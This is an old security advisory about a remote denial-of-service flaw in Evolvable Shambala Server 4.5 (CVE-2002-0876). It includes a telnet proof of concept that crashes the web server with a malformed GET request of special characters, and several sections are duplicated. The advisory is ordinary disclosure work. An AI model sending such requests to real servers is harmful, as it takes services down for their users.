Evolvable Shambala Server Web Server Denial Of Service Vulnerability
BID:4897
Info
Evolvable Shambala Server Web Server Denial Of Service Vulnerability
| Bugtraq ID: | 4897 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2002-0876 |
| Remote: | Yes |
| Local: | No |
| Published: | May 31 2002 12:00AM |
| Updated: | Jul 11 2009 01:56PM |
| Credit: | Discovery credited to Daniel Nyström. |
| Vulnerable: |
Evolvable Shambala Server 4.5 |
| Not Vulnerable: | |
Exploit / POC
Evolvable Shambala Server Web Server Denial Of Service Vulnerability
The following proof of concept was provided by Daniel Nyström:
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#☼%&/()=?
Connection closed by foreign host.
you#
Daniel Nyström (excE) <[email protected]> has also provided the following exploit:
The following proof of concept was provided by Daniel Nyström:
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#&#9788;%&/()=?
Connection closed by foreign host.
you#
Daniel Nyström (excE) <[email protected]> has also provided the following exploit:
Solution / Fix
Evolvable Shambala Server Web Server Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Evolvable Shambala Server Web Server Denial Of Service Vulnerability
References:
References:
- Shambala Server Product Homepage (Evolvable Corporation)